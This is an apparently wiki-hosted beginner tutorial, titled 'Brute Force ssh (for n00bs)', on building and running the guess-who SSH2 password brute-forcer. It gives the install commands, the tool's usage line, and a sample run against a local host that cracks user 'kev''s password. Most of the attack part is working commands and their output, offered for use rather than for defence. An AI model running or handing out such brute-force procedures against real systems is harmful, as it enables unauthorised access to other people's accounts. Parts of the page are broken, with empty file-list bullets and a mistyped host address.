Le seguenti 101 parole non sono state trovate nel dizionario di 1275 termini (includendo 1275 LocalSpellingWords) e sono evidenziate qui sotto:
ac3bf1   accounts   arsenal   attacking   available   be   Brute   brute   bruter   by   can   case   Choose   chosen   common   consumer   cs   de   desired   download   Download   dumb   e3d   Execution   Expected   file   Files   files   following   folowing   for   force   Force   from   Guess   guess   gz   H2   hacker   host   if   Installation   kev   krahmer   l192   login   make   merge   merged   merging   model   n00bs   nthreads   ntries   output   packetstormsecurity   parallel   parallelism   passwd   password   Password   passwords   personalize   personalized   Please   port   potsdam   Procedure   producer   program   Program   programs   read   Required   required   root   sec   Secure   see   Selection   Several   Shell   ssh   tar   text   tgz   thread   to   uncompressed   uni   Usage   Use   user   utility   uumerge   want   who   Wind0ws   would   zip   zxvf  

Nascondi questo messaggio
Italiano English
Modifica History Actions

BruteForce_ssh_eng

Brute Force ssh (for n00bs)

Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts.
It is available from http://packetstormsecurity.org/

Required Files and programs

It is NOT required to download ALL files here. Please read CAREFULLY!


  • Required Program:

  • In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files

  • The following are to be chosen if you want to create personalized password files.

Procedure

Installation:
Download to the desired directory

tar -zxvf guess-who-0.44.tgz
make


Execution:

[root@hacker guess-who]# ./b

guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de

Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file

Expected output:

[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt
(!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ]
[ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]

As you can see the user kev has a password of arsenal